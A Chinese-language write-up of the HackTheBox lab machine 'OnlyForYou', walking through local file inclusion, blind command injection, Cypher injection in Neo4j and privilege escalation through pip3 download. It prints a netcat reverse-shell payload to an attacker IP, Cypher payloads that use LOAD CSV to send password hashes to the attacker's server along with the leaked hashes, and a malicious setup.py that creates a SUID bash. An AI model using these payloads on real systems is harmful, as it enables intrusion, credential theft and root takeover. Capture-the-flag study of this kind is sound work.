HackTheBox - Medium - Linux - OnlyForYou

OnlyForYou

OnlyForYou 是一台中等难度的 Linux 计算机,其特点是 Web 应用程序容易受到本地文件包含 (LFI) 的影响,该应用程序用于访问源代码,从而揭示盲目命令注入漏洞,从而导致目标系统上的 shell。该计算机运行多个本地服务,其中一个使用默认凭据,并公开易受"Cypher"注入攻击的端点。利用此漏洞会泄漏"Neo4j"数据库中的哈希值,从而授予对计算机的"SSH"访问权限。最后,配置错误的"sudoers"文件允许以"root"权限运行"pip3 download"命令。权限提升是通过在本地"Gogs"服务上创建和托管恶意"Python"包并下载来实现的。


外部信息收集

端口扫描

循例nmap

Web枚举

ffuf扫vhost

有一个beta

beta子域

在这里的Source code可以下载zip

zip是beta的站点源码

任意文件读取
python3 复制代码
@app.route('/download', methods=['POST'])
def download():
    image = request.form['image']
    filename = posixpath.normpath(image) 
    if '..' in filename or filename.startswith('../'):
        flash('Hacking detected!', 'danger')
        return redirect('/list')
    if not os.path.isabs(filename):
        filename = os.path.join(app.config['LIST_FOLDER'], filename)
    try:
        if not os.path.isfile(filename):
            flash('Image doesn\'t exist!', 'danger')
            return redirect('/list')
    except (TypeError, ValueError):
        raise BadRequest()
    return send_file(filename, as_attachment=True)

在app.py中,/download的实现很明显存在任意文件读取,原因是虽然对filename做了过滤"..."以防止目录遍历,但由于os.path.join的特性,这个函数如果遇到绝对路径,则会直接返回这个绝对路径,从而忽略掉app.config['LIST_FOLDER'],所以我们可以不需要.../也可以实现目录遍历

读nginx配置文件

Foldhold - RCE

知道路径后,读主站的app.py

发现那个表单其实是会被处理的,通过import我们可以得知参数被传入了另一个模块里的函数处理

from form import sendmessage

读form.py

很明显,常规command injection,但是是盲的。

尝试通过nc连接攻击机,可行

常规reverse shell payload

mkfifo+/tmp/f1%3bnc+10.10.14.18+8888+<+/tmp/f1+|+/bin/bash+>+/tmp/f1

内部信息收集

ss -tlnp发现好几个端口

传个chisel过去,攻击机开启server

目标机器连接过来,反向socks

火狐插件

3000端口 - Gogs

8001端口

看见是一个简陋的登录框,弱口令就登进去了

admin:admin

在dashboard中可以看到它使用neo4j

本地横向移动 -> john

在Employee可以搜索,但是这里存在注入

查表

a' CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.18:8000/'+d AS y RETURN y//

获取key的属性

a' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.18:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
shell 复制代码
10.10.11.210 - - [26/Dec/2023 18:21:02] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [26/Dec/2023 18:21:03] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [26/Dec/2023 18:21:04] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [26/Dec/2023 18:21:04] "GET /?username=john HTTP/1.1" 200 -

爆john的密码,CrackStation出了明文密码

使用这组凭据我们能够通过ssh登录john

拿到user flag

本地权限提升

sudo -l

这里会从gogs中下载pip包,pip download也会执行setup.py

回到3000端口,使用john的凭据登录,我们可以看到这里有个存储库

打法很简单,我们制作恶意pip包,然后上传到gogs存储库中,从而允许我们sudo pip下载恶意pip包从而提权

创建个文件夹,setup.py:

python3 复制代码
import os

os.system('cp /bin/bash /tmp/bash;chmod +s /tmp/bash')


from setuptools import setup, find_packages
import sys

setup(
    name="packer",
    version="0.1.0",
    author="",
    author_email="",
    description="Python Framework.",
    license="MIT",
    url="",
    packages=find_packages(),
    include_package_data=True,
    classifiers=[
        "Environment :: Web Environment",
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: Chinese',
        'Operating System :: MacOS',
        'Operating System :: Microsoft',
        'Operating System :: POSIX',
        'Operating System :: Unix',
        'Topic :: NLP',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    zip_safe=True,
)

然后运行setup.py创建tar.gz包

然后在存储库中上传文件

上传文件且提交后,得到的url是

http://127.0.0.1:3000/john/Test/raw/master/packer-0.1.0.tar.gz

此外还需要做一件事就是将该存储库设为公开,否则因为它是私有的导致无权访问

这一切搞定之后,直接sudo

root flag还在老地方

相关推荐
网络安全queen9 小时前
认识网络安全
网络·网络协议·网络安全
番茄酱料10 小时前
idea-java项目中的全部接口提取
java·网络安全·intellij-idea
IT-sec12 小时前
jquery-picture-cut 任意文件上传(CVE-2018-9208)
android·前端·javascript·安全·web安全·网络安全·jquery
风间琉璃""14 小时前
对传统加密算法降维打击?!——量子计算
网络安全·安全威胁分析·量子计算·加密算法·传统算法
_Nickname18 小时前
NSSCTF web刷题
前端·web·ctf
摘星怪sec18 小时前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
肾透侧视攻城狮1 天前
网络空间安全之一个WH的超前沿全栈技术深入学习之路(11)——实战之DNMAP 分布式集群执行大量扫描任务:就怕你学成黑客啦!
分布式·学习·安全·web安全·网络安全·安全威胁分析·可信计算技术
南暮思鸢1 天前
应急响应靶机——linux1
linux·运维·网络安全·centos·write up·应急响应靶机·蓝队溯源
GIS好难学1 天前
《Vue零基础入门教程》第二课:搭建开发环境
前端·javascript·vue.js·ecmascript·gis·web
diandian~1 天前
CVE-2022-4230
web